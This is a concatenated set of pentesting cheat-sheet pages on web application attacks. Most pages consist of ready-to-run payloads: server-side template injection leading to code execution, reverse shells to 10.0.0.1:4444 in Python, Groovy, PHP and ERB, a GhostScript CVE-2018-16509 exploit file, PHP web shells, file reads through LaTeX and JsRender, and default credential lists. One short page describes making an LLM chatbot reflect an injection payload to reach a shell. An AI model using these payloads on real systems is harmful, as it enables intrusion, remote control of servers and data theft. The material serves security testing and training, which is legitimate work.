22 | 23 | ## Bypass ALLOWED_HOSTS 24 | 25 | If we get the error **“Invalid HTTP_HOST header: 'x.x.x.x:8000'. You may need to add 'x.x.x.x' to ALLOWED_HOSTS"** when accessing a website written in Django, intercept the request and change the value of the **Host** header, for example to one of the following. 26 | Then you should be able to access the website. 27 | 28 | ```bash 29 | Host: 0.0.0.0:8000 30 | # or 31 | Host: 127.0.0.1:8000 32 | ``` 33 | 34 | Or, if we have permission to edit the website's configuration, add the new IP address to **ALLOWED_HOSTS** in **`settings.py`**. 35 | 36 | ```bash 37 | ALLOWED_HOSTS = ['0.0.0.0', '127.0.0.1', 'x.x.x.x'] 38 | ``` 39 | 40 |

41 | 42 | ## Create a New User 43 | 44 | ```bash 45 | python3 manage.py createsuperuser 46 | ``` 47 | -------------------------------------------------------------------------------- /src/exploit/web/framework/python/tornado-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Tornado Pentesting 3 | description: Tornado is a Python web server and web application framework. 4 | tags: 5 | - Web 6 | refs: 7 | - https://ajinabraham.com/blog/server-side-template-injection-in-tornado 8 | date: 2023-05-28 9 | draft: false 10 | --- 11 | 12 | ## Server-Side Template Injection (SSTI) 13 | 14 | We can execute arbitrary Python script using the server-site template injection. 15 | First check if the script will be executed as below. 16 | 17 | ```bash 18 | Website by {{ 2*3 }} 19 | {{ 2*3 }} 20 | 21 | # URL parameters 22 | https://example.com/?q={{2*3}} 23 | ``` 24 | 25 | If the website shows **`6`** instead of **`2*3`**, we can execute arbitrary code. 26 | Try following payloads. 27 | 28 | ```bash 29 | {% import os %}{{ os.popen("whoami").read() }} 30 | 31 | # Reverse shell. Replace "10.0.0.1" with your own ip 32 | # It requires a listener like `nc -lvnp 4444` in local terminal. 
33 | {% import socket,subprocess,os %}{{ s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"]) }} 34 | ``` 35 | -------------------------------------------------------------------------------- /src/exploit/web/framework/ruby/__data.yml: -------------------------------------------------------------------------------- 1 | category3: ruby -------------------------------------------------------------------------------- /src/exploit/web/ghostscript-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: GhostScript Pentesting 3 | description: GhostScriipt is an interpreter for the PostScript language and PDF files. It might be vulnerable to code execution. 4 | tags: 5 | - Web 6 | refs: 7 | - https://seclists.org/oss-sec/2018/q3/142 8 | date: 2023-08-10 9 | draft: false 10 | --- 11 | 12 | ## Arbitrary Command Execution (CVE-2018-16509) Before v9.24 13 | 14 | Reference: [https://github.com/farisv/PIL-RCE-Ghostscript-CVE-2018-16509](https://github.com/farisv/PIL-RCE-Ghostscript-CVE-2018-16509) 15 | 16 | If target website uses the functionality which allows user to upload image files associated Python's **Pillow (PIL)**, we can execute remote command over **GhostScript** vulnerability (**`-dSAFER`** bypass using **`OutputFile`**). 17 | Create an image file in which contents as below, then upload it. Command will be executed in the target server. 
18 | 19 | ```txt 20 | %!PS-Adobe-3.0 EPSF-3.0 21 | %%BoundingBox: -0 -0 100 100 22 | 23 | userdict /setpagedevice undef 24 | save 25 | legal 26 | { null restore } stopped { pop } if 27 | { legal } stopped { pop } if 28 | restore 29 | mark /OutputFile (%pipe%touch /tmp/hello.txt) currentdevice putdeviceprops 30 | ``` 31 | -------------------------------------------------------------------------------- /src/exploit/web/java-rmi-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Java RMI Pentesting 3 | description: Java RMI (Java Remote Method Invocation) is a Java-based application programming interface (API) that enables developers to create distributed applications in which objects residing in one Java Virtual Machine (JVM) can invoke methods on objects residing in separate JVMs. It uses the port 1098, 1099. 4 | tags: 5 | - Web 6 | date: 2023-03-29 7 | refs: 8 | draft: false 9 | --- 10 | 11 | No content yet. -------------------------------------------------------------------------------- /src/exploit/web/jboss-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: JBOSS Pentesting 3 | description: JBOSS AS (Application Server), also known as WildFly, is an application server which is written in Java. 4 | tags: 5 | - Web 6 | date: 2023-03-29 7 | refs: 8 | draft: false 9 | --- 10 | 11 | ## Enumeration 12 | 13 | ```sh 14 | msfconsole 15 | msf > use auxiliary/scanner/http/jboss_vulnscan 16 | ``` 17 | 18 |
19 | 20 | ## Common Directories 21 | 22 | ```txt 23 | /admin-console/ 24 | /invoker/JMXInvokerServlet 25 | /jbossws/ 26 | /jmx-console/ 27 | /jmx-console/HtmlAdaptor 28 | /management 29 | /manager 30 | /status?full=true 31 | /web-console/ 32 | /web-console/Invoker 33 | /web-console/ServerInfo.jsp 34 | ``` 35 | 36 |
37 | 38 | ## Default Credentials 39 | 40 | ```txt 41 | admin:admin 42 | ``` 43 | 44 |
45 | 46 | ## Exploitation 47 | 48 | [JexBoss](https://github.com/joaomatosf/jexboss) is available as an exploitation CLI tool. 49 | 50 | ```bash 51 | git clone https://github.com/joaomatosf/jexboss.git 52 | cd jexboss 53 | pip3 install -r requirements.txt 54 | python3 jexboss.py -host https://example.com:8080 55 | 56 | # Reverse Shell 57 | Shell> /bin/bash -i > /dev/tcp/10.0.0.1/4444 0>&1 2>&1 58 | ``` -------------------------------------------------------------------------------- /src/exploit/web/jenkins-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Jenkins Pentesting 3 | description: Jenkins is an automation server which helps automate the parts of software development related to building, testing, and deploying, etc. 4 | tags: 5 | - Reverse Shell 6 | - Web 7 | date: 2023-01-01 8 | refs: 9 | draft: false 10 | --- 11 | 12 | ## Brute Force Credentials 13 | 14 | ```sh 15 | msfconsole 16 | msf > use auxiliary/scanner/http/jenkins_login 17 | ``` 18 | 19 |
20 | 21 | ## Reverse Shell on Dashboard 22 | 23 | You need to have valid credentials. 24 | 25 | 1. **Open a Listener on Your Local Machine** 26 | 27 | ```sh 28 | nc -lvnp 4444 29 | ``` 30 | 31 | 2. **Log in to Jenkins** 32 | 33 | Access "http://localhost:8080" in a browser and log in. 34 | 35 | 3. **Click "Manage Jenkins" -> "Script Console"** 36 | 37 | 4. **Add the Payload in the Console** 38 | 39 | ```java 40 | r = Runtime.getRuntime() 41 | p = r.exec(["/bin/bash", "-c", "exec 5<>/dev/tcp//4444; cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) 42 | p.waitFor() 43 | ``` 44 | 45 | 5. **Click "Run"** 46 | 47 | Then you should get a shell. -------------------------------------------------------------------------------- /src/exploit/web/limesurvey-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: LimeSurvey Pentesting 3 | description: LimeSurvey is a statistical survey web app written in PHP, backed by a MySQL, SQLite, PostgreSQL or MSSQL database. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-03-31 8 | draft: false 9 | --- 10 | 11 | ## Default Credentials 12 | 13 | ```bash 14 | admin:password 15 | ``` 16 | 17 | ## Remote Code Execution (RCE) version < 3.16 18 | 19 | Reference: [https://www.exploit-db.com/exploits/46634](https://www.exploit-db.com/exploits/46634) 20 | -------------------------------------------------------------------------------- /src/exploit/web/llm-chatbot-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: LLM Chatbot Pentesting 3 | description: An LLM chatbot in a web application can be abused with some exploit techniques. 4 | tags: 5 | - LLM 6 | - Web 7 | refs: 8 | date: 2025-03-12 9 | draft: false 10 | --- 11 | 12 | ## SSTI 13 | 14 | If the chatbot reflects our prompt in the response, we might be able to abuse it with SSTI. For example, 15 | 16 | ```txt 17 | Prompt: How are you?
{{ 2*3 }} 18 | 19 | Response: I will answer your question "How are you? 6". I'm good, thanks! How about you? 20 | ``` 21 | 22 | If it works, we may be able to achieve a reverse shell. -------------------------------------------------------------------------------- /src/exploit/web/method/_data.yml: -------------------------------------------------------------------------------- 1 | category2: method -------------------------------------------------------------------------------- /src/exploit/web/method/http-rate-limit-bypass.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: HTTP Rate Limit Bypass 3 | description: The HTTP 429 “Too Many Requests” response occurs when the client has sent too many requests in a given amount of time (rate limiting), because the server limits the number of requests. However, we may be able to bypass this restriction. 4 | tags: 5 | - Web 6 | refs: 7 | - https://infosecwriteups.com/bypassing-rate-limit-like-a-pro-5f3e40250d3c 8 | date: 2023-03-07 9 | draft: false 10 | --- 11 | 12 | ## Bypass 13 | 14 | We may be able to bypass the rate limiting by adding one of the following headers and changing the IP per request. This works when the server derives the client IP from such headers instead of from the actual connection. 15 | Sometimes, we need to add multiple headers. 16 | 17 | ```bash 18 | X-Forwarded: 19 | X-Forwarded-For: 20 | X-Forwarded-Host: 21 | X-Client-IP: 22 | X-Remote-IP: 23 | X-Remote-Addr: 24 | X-Host: 25 | X-Originating-IP: 26 | ``` 27 | -------------------------------------------------------------------------------- /src/exploit/web/method/waf-detection.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: WAF (Web Application Firewall) Detection 3 | description: WAF (Web Application Firewall) is a specific form of application firewall that filters, monitors, and blocks HTTP traffic to and from a web service.
4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-07-14 8 | draft: false 9 | --- 10 | 11 | ## Automation 12 | 13 | ```bash 14 | nmap --script=http-waf-fingerprint example.com 15 | 16 | wafw00f https://example.com 17 | ``` -------------------------------------------------------------------------------- /src/exploit/web/microsoft/_data.yml: -------------------------------------------------------------------------------- 1 | category2: microsoft -------------------------------------------------------------------------------- /src/exploit/web/opencats-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: OpenCATS Pentesting 3 | description: OpenCATS is an Applicant Tracking System designed for Recruiters to manage recruiting process from job posting, candidate application, through to candidate selection and submission. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-01-31 8 | draft: false 9 | --- 10 | 11 | ## Default Credentials 12 | 13 | ```bash 14 | admin:admin 15 | admin:cats 16 | ``` -------------------------------------------------------------------------------- /src/exploit/web/php-rce-cheat-sheet.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: PHP RCE Cheat Sheet 3 | description: 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-10-05 8 | draft: false 9 | --- 10 | 11 | ## Web Shell 12 | 13 | ```bash 14 | 15 | 16 | <%3fphp+system($_['cmd']);%3f> 17 | <%3fphp+echo+system($_['cmd']);%3f> 18 | ``` 19 | 20 | We can access to `/?cmd=whoami`. 21 | 22 |
23 | 24 | ## Reverse Shell 25 | 26 | ```bash 27 | & /dev/tcp/10.0.0.1/4444 0>&1');?> 28 | & /dev/tcp/10.0.0.1/4444 0>&1"');?> 29 | <%3fphp+system('bash+-i+>%26+%2fdev%2ftcp%2f10.0.0.1%2f4444+0>%261');%3f> 30 | <%3fphp+system('bash+-c+"bash+-i+>%26+%2fdev%2ftcp%2f10.0.0.1%2f4444+0>%261"');%3f> 31 | ``` -------------------------------------------------------------------------------- /src/exploit/web/restaurant-management-system.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Restaurant Management System (RMS) Pentesting 3 | description: 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-01-29 8 | draft: false 9 | --- 10 | 11 | ## Remote Code Execution (RCE) v1.0 12 | 13 | See the [Exploit-DB](https://www.exploit-db.com/exploits/47520) for details. 14 | 15 | ```bash 16 | python3 rms-rce.py https://example.com/rms/ 17 | ``` 18 | 19 | When uploading successfully, we can access to https://example.com/rms/images/reverse-shell.php?cmd=id -------------------------------------------------------------------------------- /src/exploit/web/security-risk/_data.yml: -------------------------------------------------------------------------------- 1 | category2: security-risk -------------------------------------------------------------------------------- /src/exploit/web/security-risk/crlf-injection.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: CRLF (Carriage Return Line Feed) Injection 3 | description: CRLF Injection occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL. 4 | tags: 5 | - Web 6 | refs: 7 | - https://owasp.org/www-community/vulnerabilities/CRLF_Injection 8 | date: 2022-12-26 9 | draft: false 10 | --- 11 | 12 | No content yet. 
-------------------------------------------------------------------------------- /src/exploit/web/security-risk/dom-cloberring.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: DOM Clobbering 3 | description: 4 | tags: 5 | - Web 6 | refs: 7 | - https://portswigger.net/web-security/dom-based/dom-clobbering 8 | date: 2023-06-15 9 | draft: false 10 | --- 11 | 12 | ## Basic Exploitation 13 | 14 | If the website adds JavaScript code into the DOM when loading the page, as below, 15 | 16 | ```jsx 17 | window.onload = function() { 18 | let someObj = window.someObj || {}; 19 | let script = document.createElement('script'); 20 | script.src = someObj.url; 21 | document.body.appendChild(script); 22 | } 23 | ``` 24 | 25 | We may manipulate this **`someObj`** and override its properties (**`url`** here) using **`anchor`** elements; then we can execute arbitrary JavaScript code. 26 | For example, insert the following code in a comment, search field, etc. on the target website. 27 | 28 | ```html 29 | 30 | ``` 31 | -------------------------------------------------------------------------------- /src/exploit/web/security-risk/erb-ssti.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: ERB SSTI 3 | description: ERB may be vulnerable to SSTI. 4 | tags: 5 | - Web 6 | refs: 7 | - https://trustedsec.com/blog/rubyerb-template-injection 8 | date: 2024-04-13 9 | draft: false 10 | --- 11 | 12 | ## Payloads 13 | 14 | Try the following payloads in the URL path, parameters, inputs, etc. 15 | 16 | ```bash 17 | <%= 7*7 %> 18 | <%= user.username %> 19 | <%= system("whoami"); %> 20 | ``` 21 | 22 |
23 | 24 | ## Exploit 25 | 26 | If the above payloads affect the responses, we can inject arbitrary code as below: 27 | 28 | ```bash 29 | <%= system("ping -c 1 10.0.0.1"); %> 30 | 31 | # Reverse Shell 32 | <%= system("bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"); %> 33 | ``` -------------------------------------------------------------------------------- /src/exploit/web/security-risk/file-upload-attack-on-imagemagick.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: File Upload Attack on ImageMagick 3 | description: If a website uses ImageMagick to analyze or modify uploaded images, we might be able to execute remote code. 4 | tags: 5 | - Web 6 | refs: 7 | - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Picture%20ImageMagick 8 | date: 2023-08-24 9 | draft: false 10 | --- 11 | 12 | This page has no content yet; please refer to the references listed for this page to achieve this attack. -------------------------------------------------------------------------------- /src/exploit/web/security-risk/host-header-attack.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Host Header Attack 3 | description: 4 | tags: 5 | - Web 6 | refs: 7 | - https://portswigger.net/web-security/host-header/exploiting 8 | date: 2023-06-11 9 | draft: false 10 | --- 11 | 12 | ## Abuse Connection State 13 | 14 | If the web server validates only the first request on a connection, we may be able to exploit the second request by keeping the connection open and changing the **Host** header to the internal page. 15 | 16 | ### 1. Send the First Request 17 | 18 | ```bash 19 | GET / HTTP/2 20 | Host: example.com 21 | ... 22 | Connection: keep-alive 23 | 24 | ``` 25 | 26 | ### 2. Send the Second Request.
27 | 28 | ```bash 29 | POST /admin/change-email HTTP/2 30 | Host: 192.168.0.1 31 | 32 | email=admin@example.com&new_email_1=attacker@evil.com&new_email_2=attacker@evil.com 33 | ``` 34 | 35 | As a result, we may be able to change the admin's email to arbitrary email. -------------------------------------------------------------------------------- /src/exploit/web/security-risk/http-header-injection.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: HTTP Header Injection 3 | description: If the target site inserts user provided value into the response header without sanitizing, attacker may inject arbitrary key/value. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2024-02-08 8 | draft: false 9 | --- 10 | 11 | ## Exploit 12 | 13 | By inserting `\r\n` (URL encoded: `%0d%0a` ), we may inject arbitrary header value in the response. 14 | 15 | ```bash 16 | # Inject "\r\nSet-Cookie: sessionid=123456" into the response header 17 | /?origin=example%0d%0aSet-Cookie:%20SESSID%3d123456 18 | ``` 19 | 20 |
21 | 22 | ## Exploit (XSS) 23 | 24 | ```bash 25 | /?origin=example%0d%0a 26 | ``` -------------------------------------------------------------------------------- /src/exploit/web/security-risk/idor-attack.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: IDOR (Insecure Direct Object References) Attack 3 | description: IDOR is a type of access control vulnerability in web applications. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-08-22 8 | draft: false 9 | --- 10 | 11 | ## Find Vulnerabilities from HTML Source Code 12 | 13 | First check values of attributes on input elements. 14 | 15 | ```html 16 | 17 | ``` 18 | 19 | Then try what will happen when you change the Cookie value in a HTTP header. 20 | 21 | ```txt 22 | Cookie: user_id=12 23 | ``` 24 | 25 |
26 | 27 | ## Change GET Parameters 28 | 29 | ### Manual 30 | 31 | ```sh 32 | /user?id=1 33 | /user?id=2 34 | /user?id=-1 35 | /user?id=00 36 | 37 | /admin/posts/1 38 | /admin/posts/-1 39 | /admin/posts/00 40 | 41 | /static/1.txt 42 | /static/2.txt 43 | /static/-1.txt 44 | /static/00.txt 45 | ``` 46 | 47 | ### Automation 48 | 49 | ```sh 50 | seq 0 100 | ffuf -u https://example.com/user?id=FUZZ -w - 51 | 52 | wfuzz -z file,./numbers.txt https://example.com/user?id=FUZZ 53 | ``` 54 | 55 |
56 | 57 | ## Change POST Parameters 58 | 59 | ```bash 60 | address=1&user_id=1 61 | address=1&user_id=2 62 | 63 | # URL Encode '&' 64 | address=1%26user_id=2 65 | ``` 66 | -------------------------------------------------------------------------------- /src/exploit/web/security-risk/insecure-deserialization.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Insecure Deserialization 3 | description: Insecure Deserialization is the exploitation of vulnerabilities in the deserialization process of a computer system to execute unauthorized code, gain access to sensitive information, or perform other malicious actions. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-02-17 8 | draft: false 9 | --- 10 | 11 | ## PHP Gadget Chains 12 | 13 | ### PHPGGC 14 | 15 | **[PHPGGC](https://github.com/ambionics/phpggc)** is a library of PHP unserialize() payloads along with a tool to generate them, from command line or programmatically. 16 | 17 | ```sh 18 | phpggc -l 19 | ``` 20 | 21 |
22 | 23 | ## Ysoserial 24 | 25 | **[Ysoserial](https://github.com/frohoff/ysoserial)** is a proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. 26 | -------------------------------------------------------------------------------- /src/exploit/web/security-risk/latex-injection.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: LaTeX Injection 3 | description: LaTeX is a software system for document preparation. It may be vulnerable to arbitrary command injection or path traversal. 4 | tags: 5 | - Web 6 | refs: 7 | - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection 8 | - https://book.hacktricks.xyz/pentesting-web/formula-doc-latex-injection#latex-injection 9 | date: 2023-06-19 10 | draft: false 11 | --- 12 | 13 | ## Payloads - Read Files 14 | 15 | ```bash 16 | # Read file 17 | \input{/etc/passwd} 18 | $\input{/etc/passwd}$ 19 | $$\input{/etc/passwd}$$ 20 | 21 | \include{example} # Read example.tex 22 | $\include{example}$ 23 | $$\include{example}$$ 24 | 25 | \lstinputlisting{/etc/passwd} 26 | $\lstinputlisting{/etc/passwd}$ 27 | $$\lstinputlisting{/etc/passwd}$$ 28 | ``` 29 | 30 |
31 | 32 | ## Payloads - Write File 33 | 34 | ```bash 35 | \newwrite\outfile 36 | $\newwrite\outfile$ 37 | $$\newwrite\outfile$$ 38 | 39 | \openout\outfile=cmd.tex 40 | $\openout\outfile=cmd.tex$ 41 | $$\openout\outfile=cmd.tex$$ 42 | 43 | \write\outfile{Hello-World} 44 | $\write\outfile{Hello-World}$ 45 | $$\write\outfile{Hello-World}$$ 46 | ``` 47 | -------------------------------------------------------------------------------- /src/exploit/web/security-risk/sql-injection.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: SQL Injection 3 | description: SQL injection (SQLi) is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. 4 | tags: 5 | - Database 6 | - Reverse Shell 7 | - SQL Injection 8 | - Web 9 | refs: 10 | date: 2023-06-27 11 | draft: false 12 | --- 13 | 14 | ## Identify Where SQL Injection can be Performed 15 | 16 | There are many places where SQLi can be performed. For example, 17 | 18 | - URL parameters 19 | - POST parameters 20 | - HTTP request headers (Cookie, User-Agent, etc.) 21 | 22 |
23 | 24 | ## Cheat Sheet 25 | 26 | To see SQL injection cheat sheet, please refer to [this page](/exploit/web/security-risk/sql-injection-cheat-sheet/). 27 | 28 |
29 | -------------------------------------------------------------------------------- /src/exploit/web/security-risk/wkhtmltopdf-ssrf.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: wkhtmltopdf SSRF 3 | description: wkhtmltopdf is a command line tool to render HTML into PDF using Qt WebKit. It is vulnerable to SSRF. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-04-08 8 | draft: false 9 | --- 10 | 11 | ## Exploitation 12 | 13 | Create a PHP payload to read local file. 14 | 15 | ```php 16 | 17 | ``` 18 | 19 | Then start web server in local machine. 20 | 21 | ```bash 22 | php -S 0.0.0.0:8000 23 | ``` 24 | 25 | Send request to where wkhtmltopdf is affected. For example, 26 | 27 | ```bash 28 | /htmltopdf?item= 29 | ``` 30 | 31 | Now we can see the system users list via a generated PDF. -------------------------------------------------------------------------------- /src/exploit/web/security-risk/xst.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: XST (Cross-Site Tracing) 3 | description: XST is a network security vulnerability exploiting the HTTP TRACE method. 4 | tags: 5 | - Web 6 | - XST 7 | refs: 8 | date: 2022-12-22 9 | draft: false 10 | --- 11 | 12 | ## Add Cookie Header 13 | 14 | ```sh 15 | TRACE / HTTP/1.1 16 | ... 17 | Cookie: name=value 18 | ... 19 | ``` -------------------------------------------------------------------------------- /src/exploit/web/template-engine/_data.yml: -------------------------------------------------------------------------------- 1 | category2: template-engine -------------------------------------------------------------------------------- /src/exploit/web/template-engine/jsrender-template-injection.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: JsRender Template Injection 3 | description: JsRender is a light-weight but powerful template engine. 
It is vulnerable to template injection. 4 | tags: 5 | - SSTI 6 | - Web 7 | refs: 8 | - https://appcheck-ng.com/template-injection-jsrender-jsviews 9 | date: 2023-03-26 10 | draft: false 11 | --- 12 | 13 | ## Investigation 14 | 15 | Try to insert arbitrary code into double curly brackets. If the result of the code is reflected in the page, we can inject malicious code in the template. 16 | 17 | ```bash 18 | {{:2*3}} 19 | {{:"test".toString}} 20 | ``` 21 | 22 |
23 | 24 | ## Exploitation 25 | 26 | ```bash 27 | # XSS 28 | {{:"test".toString.constructor.call({},"alert(1)")}} 29 | # Read local files 30 | {{:"test".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /etc/passwd').toString()")()}} 31 | ``` 32 | -------------------------------------------------------------------------------- /src/exploit/web/tool/_data.yml: -------------------------------------------------------------------------------- 1 | category2: tool -------------------------------------------------------------------------------- /src/exploit/web/tool/add-custom-http-headers-in-burp-suite.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Add Custom HTTP Headers in Burp Suite 3 | description: In Burp Suite, we can add custom header by setting up options. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-08-14 8 | draft: false 9 | --- 10 | 11 | ## Add Custom HTTP Headers 12 | 13 | In some cases such as bug bounty programs, it may be convenient to set custom HTTP headers in advance. 14 | 15 | 1. Go to **Proxy -> Options** tab. 16 | 2. Scroll down to **"Match and Replace"**. 17 | 3. Click on **"Add"**. 18 | 4. Set rule: 19 | 20 | - **User Agent** 21 | 22 | ```txt 23 | Type: Request header 24 | Match: ^User-Agent.*$ 25 | Replace: User-Agent: HackerOne-username 26 | Comment: 27 | ``` 28 | 29 | - **New Original Header** 30 | 31 | ```txt 32 | Type: Request header 33 | Match: (empty) 34 | Replace: X-Bug-Bounty: HackerOne-username 35 | Comment: 36 | ``` 37 | 38 | 5. Check the box of **"Regex match"**. 39 | 6. Click on **"OK"**. 40 | 7. Search for the rule in the list and click on **"Enabled"**. 
41 | -------------------------------------------------------------------------------- /src/exploit/web/tool/burp-suite-troubleshooting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Burp Suite Troubleshooting 3 | description: This article might be able to fix the problems of Burp Suite. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-11-28 8 | draft: false 9 | --- 10 | 11 | ## Fix Error “Failed to connect to x.x.x.x:443” 12 | 13 | If we try to HTTP access rather than HTTPS, This error occurs because the Burp’s embedded browser uses secure connections automatically by default. 14 | 15 | If we got the error, we may be able to solve the problem by the following methods: 16 | 17 | 1. In the embedded browser, open Settings by clicking on three dots menu icon. 18 | 2. Once Settings screen opens, go to “Privacy and security” → “Security”. 19 | 3. In “Advanced” section, uncheck “Always use secure connections” then close the Settings. 20 | 4. Enter the desired URL including “http://”. **If all goes well, we may be able to access it.** 21 | -------------------------------------------------------------------------------- /src/exploit/web/tool/integrate-burp-request-and-sqlmap.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Integrate Burp Request and SQLmap 3 | description: We can use the Burp Suite request state for SQLmap by downloading item. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-08-14 8 | draft: false 9 | --- 10 | 11 | ## Download Request File in Burp Suite 12 | 13 | 1. Right click on the request field in **Burp Suite**. 14 | 2. Click **"Save item"** or **"Copy to file"** to download the request state. 15 | 3. Save as **"request.txt"** (this is arbitrary name). 16 | 17 |
18 | 19 | ## Using Request File in SQLmap 20 | 21 | After downloading the request file in Burp Suite as the previous section, we can use when running **SQLmap**. 22 | 23 | ```sh 24 | sqlmap -r request.txt 25 | ``` 26 | 27 | By the way, we can see what **SQLmap** send payloads to websites by adding the **`--proxy`** flag. 28 | 29 | ```sh 30 | # 8080 is the default port of Burp Suite 31 | sqlmap -r request.txt --proxy http://127.0.0.1:8080 32 | ``` -------------------------------------------------------------------------------- /src/exploit/web/tool/socks-proxy-in-burp-suite.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: SOCKS Proxy in Burp Suite 3 | description: If we want to use SOCKS proxy in Burp Suite, we can add it in the proxy setting. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-08-14 8 | draft: false 9 | --- 10 | 11 | ## Setup SOCKS Proxy 12 | 13 | 1. In **Burp Suite**, go to **Proxy → Proxy settings**. 14 | 2. In the settings window, select **User** tab and go to **Netwotk → Connections** in left pane. 15 | 3. In the **SOCKS** proxy section, enable **"Override options for this project only"**. 16 | 4. Fill proxy host and port as follow: 17 | 18 | ```bash 19 | SOCKS proxy host: 127.0.0.1 20 | SOCKS proxy port: 9251 21 | ``` 22 | 23 | 5. Check **"Use SOCKS proxy"** and close the window. 24 | -------------------------------------------------------------------------------- /src/exploit/web/web-browser-settings-for-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Web Browser Settings for Pentesting 3 | description: 4 | tags: 5 | - Web 6 | refs: 7 | date: 2022-12-24 8 | draft: false 9 | --- 10 | 11 | 12 | ## Bypass Port Protection 13 | 14 | Many browsers don't accept uncommon ports for HTTP (HTTPS). 15 | For example, when we attempt to access [http://example.com:22](http://example.com:22/), browsers present that it cannot be accessed. 
16 | 17 | To release such a restricted thing, we can edit the setting in browsers. 18 | 19 | ### Firefox 20 | 21 | 1. Enter **"about:config"** in search bar. 22 | 2. Input **"network.security.ports.banned.override"** in the form. 23 | 3. Add the desired port (e.g. “22”) to **string**. -------------------------------------------------------------------------------- /src/exploit/web/web-php-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Web PHP Pentesting 3 | description: 4 | tags: 5 | - Web 6 | refs: 7 | date: 2024-05-17 8 | draft: false 9 | --- 10 | 11 | ## Source Code Reveal 12 | 13 | Try appending `~` suffix at the end of the `php` extension in path. This is the temporary file which is created by editors or version control systems so it’s worth try it to see the source code. 14 | 15 | ```txt 16 | https://example.com/index.php~ 17 | ``` 18 | 19 |
20 | 21 | ## Deobfuscate PHP Files with Syntax Highlighting 22 | 23 | According to the [PHP Manual](https://www.php.net/manual/en/function.highlight-file.php), you might be able to deobfuscate php files by accessing with **`phps`** extension if the "highlight_file" is used in the target website. 24 | 25 | ```txt 26 | https://vulnerable.com/index.phps 27 | ``` -------------------------------------------------------------------------------- /src/exploit/web/webdav-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: WebDAV Pentesting 3 | description: WebDAV is a set of extensions to the Hypertext Transfer Protocol, which allows user agents to collaboratively author contents directly in an HTTP web server. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-01-09 8 | draft: false 9 | --- 10 | 11 | ## Enumeration 12 | 13 | ```sh 14 | msfconsole 15 | msf> use auxiliary/scanner/http/webdav_scanner 16 | ``` 17 | 18 |
19 | 20 | ## Default Credentials 21 | 22 | ```sh 23 | wampp:xampp 24 | ``` 25 | 26 |
27 | 28 | ## Reverse Shell 29 | 30 | ### 1. Check if the exploit can be uploaded 31 | 32 | ```sh 33 | davtest -url http://example.com/davdir -auth 'user:pass' 34 | ``` 35 | 36 | ### 2. Upload the Reverse Shell Script 37 | 38 | If we can upload the file e.g. PHP file, upload the script for reverse shell. 39 | 40 | ```sh 41 | davtest -url http://example.com/davdir -auth 'user:pass' -uploadfile shell.php -uploadloc shell.php 42 | ``` 43 | 44 | ### 3. Get a Shell 45 | 46 | In local machine, start listener for getting a shell. 47 | 48 | ```sh 49 | nc -lvnp 4444 50 | ``` 51 | 52 | Now access to http://example.com/davdir/shell.php. 53 | We should get a shell. -------------------------------------------------------------------------------- /src/exploit/web/webmin-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Webmin Pentesting 3 | description: Webmin is a web-based system administration tool for Unix. The default port is 10000. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2022-12-01 8 | draft: false 9 | --- 10 | 11 | ## Default Credentials 12 | 13 | ```txt 14 | admin:admin 15 | ``` 16 | 17 |
